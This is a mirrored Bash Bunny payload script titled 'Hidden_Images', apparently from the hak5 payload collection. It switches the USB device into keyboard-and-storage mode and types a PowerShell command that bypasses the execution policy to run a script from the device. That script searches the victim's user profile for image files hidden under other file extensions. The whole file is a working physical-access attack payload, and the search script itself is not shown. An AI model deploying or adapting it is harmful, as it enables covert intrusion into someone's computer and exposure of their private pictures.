mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
20 lines
634 B
Plaintext
20 lines
634 B
Plaintext
# Title: Hidden_Images
|
|
# Author: Murty007
|
|
# Creds: thehappydinoa
|
|
# Description: A (naive) user may attempt to hide image(picture) files by simply
|
|
# renaming them to appear to be other filetypes (i.e. Word documents etc).
|
|
# This payload uses a powershell script to walk the userprofile to look
|
|
# for image files that have been hidden in this manner.
|
|
#
|
|
# LEDS:
|
|
# Magenta: Setup
|
|
# Yellow Blink: Attacking
|
|
|
|
LED SETUP
|
|
GET SWITCH_POSITION
|
|
ATTACKMODE HID STORAGE
|
|
|
|
LED SETUP
|
|
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')"
|
|
LED ATTACK
|